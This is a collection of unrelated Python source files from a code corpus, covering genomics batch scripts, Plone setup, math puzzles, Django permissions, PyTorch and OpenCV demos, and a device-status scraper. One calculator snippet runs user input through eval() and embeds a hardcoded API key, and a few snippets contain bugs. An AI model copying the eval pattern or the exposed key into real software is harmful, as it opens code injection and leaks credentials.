' \\\n f'点击激活'\n send_mail(subject, message, sender, receiver, html_message=html_message)\n","sub_path":"celery_task/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"500667678","text":"# Python script to prepare gatk-genotype-gvcfs-v3.5-anyref files\n\n#Adjust file name for desired output name\nout = open(\"161219_gatk-genotype-gvcfs-v3.5-anyref_ILMN250_hg5.sh\", \"w\") \n\n#Set all of these values as appropriate \nref= \"GRCh38\"\nHG = \"HG005\"\t\t#genome\nplatform= \"Illumina\"\ncalls= \"Illumina_GRCh38_250x250\"\ncc = \"Ilmn250x250\" #chemistry and/or coverage\nmap = \"novoalign\" #mapper\nvc= \"sentieonHC\"\n\n\nchr = 1 \nfor i in range(22): \n\t\n\tout.write(\"dx run -y GIAB:/Workflow/GATK_V3.5/gatk-genotype-gvcfs-v3.5-anyref \" +\n\t \t\n\t\t\"-ivcfs=\" + HG + \"/\"+ ref + \"/\" + platform + \"/\" + calls + \"/Sentieon_output/\" + HG + \"_\" + str(chr) + \"_GRCh38_\"+ map + \"_\" + cc + \"_\" + vc + \"_gvcf.vcf.gz \" + \n\t\t\"-ivcfs=\" + HG + \"/\"+ ref + \"/\" + platform + \"/\" + calls + \"/Sentieon_output/\" + HG + \"_\" + str(chr) + \"_GRCh38_\"+ map + \"_\" + cc + \"_\" + vc + \"_gvcf.vcf.gz.tbi \" + \n\t\t\"-iprefix=\" + HG + \"_\" + str(chr) + \"_GRCh38_\"+ map + \"_\" + cc + \"_\" + vc + \" \" +\n\t\t\"-iref=/assets/GRCh38hs38d1noalt.fasta-index.tar.gz \" +\n\t\t\"--destination=/\" + HG + \"/\"+ ref + \"/\" + platform + \"/\" + calls + \"/Sentieon_output/\" +\t\n\t\t\"\\n\") \n\t\n\tchr = chr+1 \n\nout.close()\t\n\n","sub_path":"NISTv3.3.2/DNAnexusCommands/batch_processing_commands/Batch_Processing_shell_scritps_GRCh38/GRCh38/HG005/hg5_gatk-genotype-gvcfs-v3.5-anyref_ILMN_batch_script_GRCh38.py","file_name":"hg5_gatk-genotype-gvcfs-v3.5-anyref_ILMN_batch_script_GRCh38.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"102533361","text":"# -*- coding: utf-8 -*-\nfrom plone import api\nfrom Products.CMFPlone.interfaces import INonInstallable\nfrom zope.interface import implementer\n\n\n@implementer(INonInstallable)\nclass HiddenProfiles(object):\n def getNonInstallableProfiles(self):\n \"\"\"Hide uninstall profile from site-creation and quickinstaller\"\"\"\n return [\n \"{{cookiecutter.package_name}}:uninstall\",\n ]\n\n\ndef post_install(context):\n \"\"\"Post install script\"\"\"\n\n\ndef uninstall(context):\n \"\"\"Uninstall script\"\"\"\n # Do something at the end of the uninstallation of this package.\n\n\ndef add_catalog_indexes(context, wanted=None):\n \"\"\"Method to add our wanted indexes to the portal_catalog.\"\"\"\n catalog = api.portal.get_tool(\"portal_catalog\")\n indexes = catalog.indexes()\n indexables = []\n for name, meta_type in wanted:\n if name not in indexes:\n catalog.addIndex(name, meta_type)\n indexables.append(name)\n if len(indexables) > 0:\n catalog.manage_reindexIndex(ids=indexables)\n","sub_path":"{{cookiecutter.package_name}}/src/{{cookiecutter.namespace}}/{{cookiecutter.name}}/setuphandlers.py","file_name":"setuphandlers.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"430749988","text":"#coding:utf-8\r\n\r\n#\r\n#creat lexicon, such as lake names ,city names. 
\r\n#\r\nimport codecs\r\n\r\n\r\n\r\n# lexe2f = codecs.open(\"lex.e2f\",\"w\",\"utf-8\")\r\n# lexf2e = codecs.open(\"lex.f2e\",\"w\",\"utf-8\")\r\ngrammarFiltered = codecs.open(\"lex.f2e\",\"w\",\"utf-8\")\r\nscfgInitRules = codecs.open(\"scfg-init-rules.txt\",\"w\",\"utf-8\")\r\nfor line in open(\"scfg-init-rules\"):\r\n\tnlword = line[line.find(\"({\") + 2 : line.find(\"})\")]\r\n\tnlword = nlword.strip()\r\n\tline = line[line.find(\"})\") + 2:]\r\n\r\n\tmrword = line[line.find(\"({\") + 2 : line.find(\"})\")]\r\n\tmrword = mrword.replace(\"' \",\"'\").replace(\" '\",\"'\").strip()\r\n\r\n\t# lexe2f.write(nlword+\" \"+mrword+\" 1.0000000\\n\")\r\n\t# lexf2e.write(mrword +\" \"+nlword+\" 1.0000000\\n\")\r\n\t#Arkansas ||| 'arkansas' ||| 0.98525 1 0.98525 1 ||| 0-0 ||| 5 5 5 ||| |||\r\n\r\n\r\n\tgf = mrword +\" \"+nlword+\" 1.0000000\\n\"\r\n\t# grammarFiltered\r\n\r\n\t#Hireo Grammar\r\n\t#[X] ||| Arkansas ||| 'arkansas' ||| 0 0 1 0.13534 0 0 ||| 0-0\r\n\tif len(nlword.split(\" \"))==1:\r\n\t\tscfgInitRules.write(\"[X] ||| \"+nlword+\" ||| \"+mrword+\" ||| 5 5 5 5 0 0 ||| 0-0\\n\")\r\n\tif len(nlword.split(\" \"))==2:\r\n\t\tscfgInitRules.write(\"[X] ||| \"+nlword+\" ||| \"+mrword+\" ||| 5 5 5 5 0 0 ||| 0-0 1-1\\n\")\r\n\tif len(nlword.split(\" \"))==3:\r\n\t\tscfgInitRules.write(\"[X] ||| \"+nlword+\" ||| \"+mrword+\" ||| 5 5 5 5 0 0 ||| 0-0 1-1 2-2\\n\")\r\n\r\n","sub_path":"rewrite two methods in WASP/scfg-init-rules.py","file_name":"scfg-init-rules.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"315410124","text":"##A perfect number is a number for which the sum of its proper divisors\n##is exactly equal to the number. For example, the sum of the proper divisors\n##of 28 would be 1 + 2 + 4 + 7 + 14 = 28, which means that 28 is a perfect number.\n##\n##A number n is called deficient if the sum of its proper divisors is less than\n##n and it is called abundant if this sum exceeds n.\n##\n##As 12 is the smallest abundant number, 1 + 2 + 3 + 4 + 6 = 16, the smallest\n##number that can be written as the sum of two abundant numbers is 24. By\n##mathematical analysis, it can be shown that all integers greater than 28123\n##can be written as the sum of two abundant numbers. 
However, this upper limit\n##cannot be reduced any further by analysis even though it is known that the\n##greatest number that cannot be expressed as the sum of two abundant numbers is\n##less than this limit.\n##\n##Find the sum of all the positive integers which cannot be written as the sum\n##of two abundant numbers.\n\n\n#taken from problem 21\nfrom time import time\n\nt_start = time()\n\ndef find_proper_divisors(n):\n number = 2\n total = 1\n while number <= n**(1./2):\n # goes through integers until sqrt is reached and adds bottom and\n # top numbers to total\n if n % number == 0:\n total += number\n # if the number is not a perfect square, add the other portion\n if number != n / number:\n total += n / number\n number += 1\n else:\n number += 1\n return total\n\n##def ordered_remove(ordered_list, n):\n \n\n##\nabundant_numbers = []\n\nfor i in range(11, 28124):\n if find_proper_divisors(i) > i:\n abundant_numbers.append(i)\n\nodd_abundant_numbers = [945, 1575, 2205, 2835, 3465, 4095, 4725, 5355, 5775, 5985, 6435, 6615, 6825, 7245, 7425, 7875, 8085, 8415, 8505, 8925, 9135, 9555, 9765, 10395, 11025, 11655, 12285, 12705, 12915, 13545, 14175, 14805, 15015, 15435, 16065, 16695, 17325, 17955, 18585, 19215, 19305, 19635, 19845, 20475, 21105, 21735, 21945, 22275, 22365, 22995, 23205, 23625, 24255, 24885, 25245, 25515, 25935, 26145, 26565, 26775, 27405, 28035]\n \n\n\ntotal = 0\n\n\nfor i in range(0,21000):\n removed = 0\n if i % 2 != 0:\n for number in abundant_numbers:\n if number > i or removed == 1:\n break\n for number2 in odd_abundant_numbers:\n if ((number + number2) > i):\n break\n if ((number + number2) == i):\n removed = 1\n break\n \n else:\n## removed = 1\n for number in abundant_numbers:\n if number > i or removed == 1:\n break\n for number2 in abundant_numbers:\n if ((number + number2) > i):\n break\n if ((number + number2) == i):\n removed = 1\n break\n \n \n if removed == 0:\n total += i\n\n \n\nprint(total)\nprint(time() - t_start)\n\n##sum_abund = []\n##print(len(abundant_numbers))\n##for i in range(0,len(abundant_numbers)):\n## for j in range(0,len(abundant_numbers)):\n## sum_abund.append(abundant_numbers[i]+abundant_numbers[j])\n##total = 0\n##for i in range(0,28124):\n## if i not in sum_abund:\n## total += i\n##\n##print(total)\n","sub_path":"code/Python/old/Euler/p23_v5.py","file_name":"p23_v5.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"176528349","text":"\"\"\" Various string parsers. \"\"\"\n\nfrom builtins import map\ndef floatArgs(s, cnt=None, failWith=None):\n \"\"\" Parse a comma-delimited list of floats.\n\n Args:\n s - the string to parse\n cnt - if set, the required number of floats.\n failWith - if set, a string to flesh out error strings.\n\n Returns:\n a list of values.\n \n Raises:\n RuntimeError\n \"\"\"\n\n try:\n stringList = s.split(',')\n floatList = list(map(float(stringList)))\n except Exception as e:\n if failWith:\n raise RuntimeError(\"%s: %s\" % (failWith, s))\n else:\n raise\n\n if cnt != None and len(floatList) != cnt:\n raise RuntimeError(\"%s. 
wrong number of arguments: %s\" % (failWith, s))\n\n return floatList\n","sub_path":"CPL/strcvt.py","file_name":"strcvt.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"615945156","text":"import math\n\n\ndef a_and_b(nums):\n nums = nums.split()\n a, b = int(nums[0]), int(nums[1])\n\n if a == b:\n return 0\n\n if a > b:\n a, b = b, a\n\n diff = b - a\n count = 1\n while True:\n num = 1 + 8 * diff\n root = math.sqrt(num)\n if int(root + 0.5) ** 2 == num:\n break\n else:\n diff -= count\n count += 1\n\n if count == 1:\n return int((root - 1)//2)\n else:\n return int((root - 1) // 2)\n\n\ndef main():\n num_of_tests = eval(input())\n for i in range(num_of_tests):\n nums = input()\n print(a_and_b(nums))\n\n\nmain()\n","sub_path":"Week-04/Day16/AandB.py","file_name":"AandB.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"306705707","text":"import requests\nimport pandas as pd\nimport folium\n# Many of the prints & photographs in HAER are tagged with geographic coordinates ('latlong')\n# Using the requests package we imported, we can easily 'get' data for an item as JSON and parse it for our latlong:\n\nget_any_item = requests.get(\"https://www.loc.gov/item/al0006/?fo=json\")\n#print('latlong: {}'.format(get_any_item.json()['item']['latlong']))\n# To retrieve this sort of data point for a set of search results, we'll first use Laura's get_image_urls function.\n# This will allow us to store the web address for each item in a list, working through the search page by page.\n\ndef get_image_urls(url, items=[]):\n\n #Retrieves the image_ruls for items that have public URLs available.\n #Skips over items that are for the collection as a whole or web pages about the collection.\n #Handles pagination.\n\n # request pages of 100 results at a time\n params = {\"fo\": \"json\", \"c\": 100, \"at\": \"results,pagination\"}\n call = requests.get(url, params=params)\n data = call.json()\n results = data['results']\n for result in results:\n # don't try to get images from the collection-level result\n if \"collection\" not in result.get(\"original_format\") and \"web page\" not in result.get(\"original_format\"):\n # take the last URL listed in the image_url array\n item = result.get(\"id\")\n items.append(item)\n if data[\"pagination\"][\"next\"] is not None: # make sure we haven't hit the end of the pages\n next_url = data[\"pagination\"][\"next\"]\n #print(\"getting next page: {0}\".format(next_url))\n get_image_urls(next_url, items)\n\n return items\nurl = \"https://www.loc.gov/search/?fa=contributor:christianson,+justine&fo=json\"\n# This is the base URL we will use for the API requests we'll be making as we run the function.\n# retrieve all image URLs from the search results and store in a variable called 'image_urls'\nimage_urls = get_image_urls(url, items=[])\n\n# how many URLs did we get?\nlen(image_urls)\n\n# to save on a little time, let's see what the last 100 look like\nimg100 = image_urls[200:300]\n\nlen(img100)\n#create an empty set to store our latlongs\n# storing in a set rather than a list eliminates any potential duplicates\nspatial_set = set()\n\n# the parameters we set for our API calls taken the first function\np1 = {\"fo\" : \"json\"}\n\n# loop through the item URLs\nfor img in img100:\n\n # make HTTP request to loc.gov API for each item\n r = requests.get(img, params=p1)\n\n # extract only 
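One fix worth flagging in the `floatArgs` helper above: `list(map(float(stringList)))` calls `float()` on the whole list and gives `map()` no iterable, so it fails before any parsing happens; the intended call is `map(float, stringList)`. A corrected minimal sketch (`float_args` is a renamed illustration with simplified error handling):

```python
# Parse a comma-delimited list of floats, optionally enforcing a count.
def float_args(s, cnt=None, fail_with=None):
    try:
        values = [float(part) for part in s.split(',')]
    except ValueError:
        raise RuntimeError("%s: %s" % (fail_with or 'bad float list', s))
    if cnt is not None and len(values) != cnt:
        raise RuntimeError("%s: wrong number of arguments: %s"
                           % (fail_with or 'bad float list', s))
    return values

print(float_args("1.5,2,3", cnt=3))  # [1.5, 2.0, 3.0]
```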
from items with latlong attribute\n try:\n\n # expose in JSON format\n data = r.json()\n\n # parse for location\n results = data['item']['latlong']\n\n # add it to our running set\n spatial_set.add(results)\n\n # skip anything with missing 'latlong' data\n except:\n\n # on to the next item until we're through\n pass\n\n# show us the data!\nspatial_set\n\n# how many unique data points were we able to gather?\nlen(spatial_set)\nlatlong_list = list(spatial_set)\ndf = pd.DataFrame(latlong_list)\ndf = df[0].str.split(',', expand=True)\ndf = df.rename(columns={0: 'latitude', 1: 'longitude'})\ndf\n\n#df.to_csv('haer_sample.csv')\n# convert spreadsheet to pandas dataframe using just the first two columns of the spreadsheet\nlatlong_df = pd.read_csv('files/haer_sample.csv', usecols=[1,2])\n# convert pandas dataframe back to a list for folium\nlatlong_list = latlong_df.values.tolist()\n\n# picking a spot in the midwest to center our map around\nCOORD = [35.481918, -97.508469]\n\n# uses lat then lon - the bigger the zoom number, the closer in you get\nmap_haer = folium.Map(location=COORD, zoom_start=3)\n\n# add a marker to the base leaflet map for every latlong pair in our list\nfor i in range(len(latlong_list)):\n folium.CircleMarker(latlong_list[i], radius=1, color='#0080bb', fill_color='#0080bb').add_to(map_haer)\n# calls the map into display\nmap_haer\n","sub_path":"python/geo.py","file_name":"geo.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"223341330","text":"import numpy as np\n\ndef WarpPerspectveMatrix(src, dst):\n assert src.shape[0] == dst.shape[0] and src.shape[0] >= 4\n \n nums = src.shape[0]\n a = np.zeros((2 * nums, 8))\n b = np.zeros((2 * nums, 1))\n for i in range(0, nums):\n a_i = src[i, :]\n b_i = dst[i, :]\n a[2 * i:] = [a_i[0], a_i[1], 1, 0, 0, 0,\n -a_i[0] * b_i[0], -a_i[1] * b_i[0]]\n b[2 * i] = b_i[0]\n\n a[2 * i + 1, :] = [0, 0, 0, a_i[0], a_i[1], 1,\n -a_i[0] * b_i[1], -a_i[1] * b_i[1]]\n b[2 * i + 1] = b_i[1]\n a = np.mat(a)\n warpMatrix = a.I * b\n warpMatrix = np.insert(warpMatrix, warpMatrix.shape[0], values=1.0, axis=0)\n warpMatrix = warpMatrix.reshape(3, 3)\n return warpMatrix\n\nif __name__=='__main__':\n print('WarpMatrix')\n src = [[150.0, 457.0], [395.0, 363.0], [633.0, 291.0], [766.0, 457.0]]\n src = np.array(src)\n dst = [[46.0, 124.0], [46.0, 654.0], [634.0, 363.0], [466.0, 436.0]]\n dst = np.array(dst)\n warpMatrix = WarpPerspectveMatrix(src, dst)\n print(warpMatrix)\n","sub_path":"Homework/76+彭长江+四川/Warp.py","file_name":"Warp.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"43985838","text":"#!/usr/bin/env python3\n# -*- coding:utf8 -*-\n\nimport torch\nimport numpy as np\n\n# Tensor can store a scalar value\na = torch.tensor(3)\nprint(a) # tensor(3)\n# or an array\nb = torch.tensor([1, 2])\nprint(b) # tensor([1, 2])\n# or a matrix\nc = torch.zeros([2, 2])\nprint(c) # tensor([[0., 0.], [0., 0.]])\n# or any arbitrary dimensional tensor\nd = torch.rand([2, 2, 2])\nprint(d)\n\n\n## matrix multiple\n# @ 代表矩阵乘法 matmul\nx = torch.randn([3, 5])\ny = torch.randn([5, 4])\nz = x @ y\nd = torch.matmul(x,y)\n# z == d\n#两个矩阵相加,减,乘,除等\n\n# tensor -> numpy array, 使用torch.numpy()函数\nprint(z.numpy())\n# numpy array -> tensor, 使用from_numpy()或者直接用torch.tensor()\nnarr = 
np.random.normal(size=(3,4))\n#下面两个等价\nprint(torch.from_numpy(narr))\nprint(torch.tensor(narr))\n\n\n#automatic differentiation 自动微分,使用torch.autograd.grad(y, x)\nx = torch.tensor(1.0, requires_grad=True)\ndef u(x):\n return x*x\ndef g(u):\n return -2*u\n#g(x) = -2*x*x, dgdx=dgdu * dudx = -2 * 2x = -4\ny = g(u(x))\ndgdx = torch.autograd.grad(y, x)[0]\nprint(dgdx) #-4\n\n\n# curvr fitting 曲线拟合\n#初始的参数\n#假设目标函数为f(x) = ax^2 + bx + c\nw = torch.randn(3,1).requires_grad_(True)\nopt = torch.optim.Adam([w], lr=0.1)\n\ndef model(x):\n return w[0]*x*x + w[1]*x + w[2]\n#f = torch.stack([x * x, x, torch.ones_like(x)], 1)\n#yhat = torch.squeeze(f @ w, 1)\n return yhat\n\ndef compute_loss(y, yhat):\n loss = torch.nn.functional.mse_loss(yhat, y)\n return loss\n\ndef generate_data():\n # y = 5x*x + x - 10\n x = torch.rand(100) * 20 - 10\n y = 5 * x * x + 3\n return x, y\n\ndef train_step():\n #数据\n x, y = generate_data()\n #前向计算loss\n yhat = model(x)\n loss = compute_loss(yhat, y)\n #后向计算梯度\n opt.zero_grad()\n loss.backward()\n #更新梯度\n opt.step()\n\n#训练\nfor _ in range(1000):\n train_step()\n\nprint(w.detach().numpy())\n","sub_path":"01.PyTorch_Fundamentals/01_pytorch_basics.py","file_name":"01_pytorch_basics.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"330728803","text":"\"\"\"API的自定义权限class\nby yanwenchi\n2018.4.4 V1\n\"\"\"\n\nfrom django.contrib.auth.models import User\n\nfrom rest_framework.permissions import BasePermission\n\n\nclass ApiPermission(BasePermission):\n \"\"\"ApiPermission, 检查一个token关联的用户\n 是否具有某些权限\n\n APIView需要有_api_perms的属性:\n type: list\n eg: ['api_hotupdate_callback']\n\n 管理员用户具有超级权限,不受权限系统的控制\n \"\"\"\n\n message = '权限拒绝'\n\n def has_perms(self, user, list_perm):\n \"\"\"list_perm是否在user的所有权限中\"\"\"\n\n user_perms = User.objects.get(id=user.id).get_all_permissions()\n for perm in list_perm:\n if perm in user_perms:\n return True\n return False\n\n def get_module_perms(self, view):\n \"\"\"返回view的api_perms的属性\"\"\"\n return ['users.' 
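The `model()` in the curve-fitting record above carries an unreachable second `return yhat` (with `yhat` undefined), and the comment in `generate_data()` does not match the `y = 5 * x * x + 3` it actually produces. A cleaned-up sketch of the matrix form that the commented-out lines hint at:

```python
# Matrix form of the quadratic model: stack [x^2, x, 1] columns and
# multiply by the weight vector; equivalent to w0*x*x + w1*x + w2.
import torch

w = torch.randn(3, 1, requires_grad=True)

def model(x):
    f = torch.stack([x * x, x, torch.ones_like(x)], dim=1)  # (n, 3)
    return torch.squeeze(f @ w, 1)                          # (n,)

x = torch.rand(5)
print(model(x).shape)  # torch.Size([5])
```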
+ x for x in view._api_perms]\n\n def has_permission(self, request, view):\n \"\"\"这里是真正检查是否具有权限的地方\n\n override this method !!!\n\n 如果有权限,返回True,不然,返回False\n\n 管理员权限不受控制\n \"\"\"\n\n if request.user.is_superuser:\n return True\n\n assert hasattr(view, '_ignore_perm') and isinstance(view._ignore_perm, bool), (\n '需要在APIView中配置_ignore_perm的属性并且为bool类型'\n )\n\n if view._ignore_perm:\n return True\n\n assert hasattr(view, '_api_perms') and isinstance(view._api_perms, list), (\n '需要在APIView中配置_api_perms的属性并且为list类型'\n )\n\n return self.has_perms(request.user, self.get_module_perms(view))\n\n\ndef api_permission(*, api_perms=[], ignore_perm=False):\n \"\"\"装饰器函数\n 用来装饰APIView,指定某个api有哪些权限\n\n api_perms是django permission的list集合\n 如果想要忽略某个api的权限,设置ignore_perm=True\n\n 用法:\n 在api的app的views.py中,装饰class\n @api_permission(api_perms=['view_host', 'view_room'])\n class CleanUserCallBack(APIView):\n ...\n\n 如果你想忽略掉某个api的权限\n @api_permission(ignore_perms=True)\n class CleanUserCallBack(APIView):\n ...\n \"\"\"\n\n def _decorate(cls):\n cls._api_perms = api_perms\n cls._ignore_perm = ignore_perm\n return cls\n return _decorate\n","sub_path":"cmdb/api_permissions.py","file_name":"api_permissions.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"151529428","text":"#!/usr/bin/python\nimport re\nimport configparser\n\nclass ProspectConf:\n \"\"\"\n This Class will be reading the configuration from prospect conf file.\n \"\"\"\n def __init__(self,logger):\n \"\"\"\n This constructor will read the conf from prospect conf file\n \"\"\"\n self.logger = logger\n self.logger.info(\"in prospect_conf,ProspectConf module\")\n self.logger.info(\"Below is the given configuration\")\n config=configparser.ConfigParser()\n config.read(\"/data/apps/0bq/ingestion/prospect/conf/prospect.config\")\n self.prospect_ingestion_dir = config.get('PROSPECT','prospect.ingestion.dir')\n self.prospect_staging_dir = config.get('PROSPECT','prospect.staging.dir')\n self.prospect_log_dir = config.get('PROSPECT','prospect.log.dir')\n self.prospect_hdfs_dir = config.get('PROSPECT','prospect.hdfs.dir')\n #PROSPECT HADOOP CONFIGURATION\n self.hive_server2 = config.get('HADOOP','prospect.hive.server2')\n self.hive_port = config.get('HADOOP','prospect.port')\n self.hive_prinicipal = config.get('HADOOP','prospect.prinicipal')\n self.hive_database = config.get('HADOOP','prospect.database')\n","sub_path":"prospect_conf.py","file_name":"prospect_conf.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"574922884","text":"import iomb.util as util\nimport unittest\nimport uuid\n\n\nclass TestUtil(unittest.TestCase):\n\n def test_make_uuid(self):\n expected = str(uuid.uuid3(uuid.NAMESPACE_OID, \"flow/a/1/b\"))\n actual = util.make_uuid(\"Flow\", None, \"a\", 1, \"B\")\n self.assertEqual(expected, actual)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"605114180","text":"class Solution(object):\n def isValidSudoku(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: bool\n \"\"\"\n #检验每一组9个元素中是否有重复元素\n def isValid(str):\n checkDict = {'1':0, '2':0, '3':0, '4':0, '5':0, '6':0, '7':0, '8':0, '9':0}\n for i in str:\n if i != '.':\n checkDict[i] += 
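A minimal configparser sketch mirroring the `ProspectConf` reader above, using an in-memory string instead of the hard-coded file path (the section and key names are illustrative):

```python
# configparser usage: dotted option names like prospect.ingestion.dir
# are ordinary keys and are fetched with config.get(section, option).
import configparser

sample = """
[PROSPECT]
prospect.ingestion.dir = /data/in
prospect.staging.dir = /data/stage
"""
config = configparser.ConfigParser()
config.read_string(sample)
print(config.get('PROSPECT', 'prospect.ingestion.dir'))  # /data/in
```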
1\n if checkDict[i] > 1:\n return False\n return True\n\n #遍历9行\n for i in board:\n if not isValid(i):\n return False\n #遍历9列\n for i in xrange(9):\n checkStr = ''\n for j in xrange(9):\n checkStr += board[j][i]\n if not isValid(checkStr):\n return False\n #遍历9块\n for i in xrange(3):\n for j in xrange(3):\n checkStr = ''\n for k in xrange(3):\n checkStr += ''.join(board[j*3 + k][i*3:i*3+3])\n if not isValid(checkStr):\n return False\n\n return True\n","sub_path":"python/36.py","file_name":"36.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"378502853","text":"import urllib2\ndef wAlpha(s):\n inputq=urllib2.quote(s)\n url=\"http://api.wolframalpha.com/v2/query?input=\"+inputq+\"&appid=UAGAWR-3X6Y8W777Q\"\n wAlphaFile=urllib2.urlopen(url)\n wAlphaSt=wAlphaFile.read()\n titSplit=wAlphaSt.split(\"\")+len(\"\")]\n return result\n\ndef calculate(s):\n try:\n return eval(s,{})\n except:\n return wAlpha(s)\n","sub_path":"CalCalc.py","file_name":"CalCalc.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"117979985","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nimport urllib3\nimport re\n\n\nfrom collections import namedtuple\n\n\nUSERNAME = os.getenv('BLONDER_TONGUE_USERNAME')\nPASSWORD = os.getenv('BLONDER_TONGUE_PASSWORD')\n\n\nSESSION_ID_REGEX = re.compile(r'')\nLOGGED_IN_STR = 'Welcome Admin! Please wait while retrieving information.'\nINPUT_STATUS_REGEX = re.compile(\n r'\\s+'\n r'(?P\\d+)\\s+'\n r'(?P[\\d.]+)\\s+'\n r'(?P.+)\\s+'\n r'(?P[\\d.]+)\\s+'\n r'(?P[\\d.]+)\\s+'\n r'')\n\nInputStatus = namedtuple('InputStatus',\n ['input', 'snr', 'rf_channel', 'ts_rate', 'data_rate'])\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('host_and_port', type=str,\n help='Host and port of the http server')\n return parser.parse_args()\n\n\ndef make_cookie(session_id):\n return 'session_id={}'.format(session_id)\n\n\ndef get_session_id(http, host_and_port):\n r = http.request('GET', 'http://{}/cgi-bin/login.cgi'.format(host_and_port))\n if r.status != 200:\n raise RuntimeError('Failed to get login page')\n match_object = SESSION_ID_REGEX.search(str(r.data))\n if not match_object:\n raise RuntimeError('Failed to parse session_id from login page')\n return int(match_object.group(1))\n\n\ndef post_login(http, host_and_port, session_id):\n headers = {\n 'Cookie': make_cookie(session_id),\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Referrer': 'http://{}/cgi-bin/status.cgi?session_id={}'.format(host_and_port, session_id),\n }\n post_params = {\n 'txtUserName': USERNAME,\n 'txtPassword': PASSWORD,\n 'session_id': session_id,\n 'btnSubmit': 'Submit'\n }\n post_params_str = '&'.join('{}={}'.format(k, v) for k, v in post_params.items())\n r = http.request('POST', 'http://{}/cgi-bin/login.cgi'.format(host_and_port),\n body=post_params_str, headers=headers)\n if r.status != 200 or LOGGED_IN_STR not in str(r.data):\n raise RuntimeError('Failed to post login credentials')\n\n\ndef get_status_page(http, host_and_port, session_id):\n r = http.request('GET', 'http://{}/cgi-bin/status.cgi?session_id={}'.format(host_and_port, session_id),\n headers={'Cookie': make_cookie(session_id)})\n if r.status != 200:\n raise RuntimeError('Failed to load information page')\n return str(r.data).replace('\\\\n', '\\n')\n\n\ndef parse_status_html(html):\n matches = 
INPUT_STATUS_REGEX.findall(html)\n if len(matches) == 0:\n raise RuntimeError('Failed to parse status page')\n return map(lambda x: InputStatus(\n input=int(x[0]),\n snr=float(x[1]),\n rf_channel=x[2],\n ts_rate=float(x[3]),\n data_rate=x[4]), matches)\n\n\ndef main(host_and_port):\n http = urllib3.PoolManager()\n\n session_id = get_session_id(http, host_and_port)\n post_login(http, host_and_port, session_id)\n status_html = get_status_page(http, host_and_port, session_id)\n statuses = parse_status_html(status_html)\n\n # TODO: send this information to a database\n for status in statuses:\n print ('Input', status.input)\n print ('\\t\\tSNR:', status.snr)\n print ('\\t\\tRF Channel:', status.rf_channel)\n print ('\\t\\tTS Rate:', status.ts_rate)\n print ('\\t\\tData Rate:', status.data_rate)\n\n\nif __name__ == '__main__':\n main(**vars(get_args()))\n","sub_path":"src/scraper/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"281803860","text":"# test.py\n\nimport itertools, sys\n\ndef maxSongs(duration, tone, T):\n\tn = len(duration)\n\n\tsongs = [(duration[i], tone[i]) for i in range(n)]\n\t\n\tmaxSongs = 0\n\tfor i in range(1, n+1):\n\t\tsubsets = itertools.combinations(songs, i)\n\t\tfor setOfLenI in subsets:\n\t\t\tmaxTone = max(tone for (dur, tone) in setOfLenI)\n\t\t\tminTone = min(tone for (dur, tone) in setOfLenI)\n\t\t\tdurSum = sum(dur for (dur, tone) in setOfLenI)\n\n\t\t\tif ((durSum + maxTone - minTone) <= T):\n\t\t\t\tmaxSongs = i\n\t\n\treturn maxSongs\n\ndef main():\n\tassert ( maxSongs([3, 5, 4, 11],[2, 1, 3, 1],17) ) == 3","sub_path":"Python/maxSongs.py","file_name":"maxSongs.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"63481554","text":"import cv2\nimport numpy as np\n\n# Original Image\nimage = cv2.imread('paris.png')\ncv2.imshow('Original Image', image)\n\n# Define a kernel\nkernel = np.ones((5, 5), np.uint8)\n\n# Apply the erosion\nerosion = cv2.erode(image, kernel, iterations=1)\ncv2.imshow(\"Eroded Image\", erosion)\n\n# Dilation\ndilated_image = cv2.dilate(image, kernel, iterations=30)\ncv2.imshow(\"Dilated Image\", dilated_image)\n\n# Opening -> Good for reducing noise in the image\nopened_image = cv2.morphologyEx(image, cv2.MORPH_OPEN, kernel)\ncv2.imshow(\"Morph Open\", 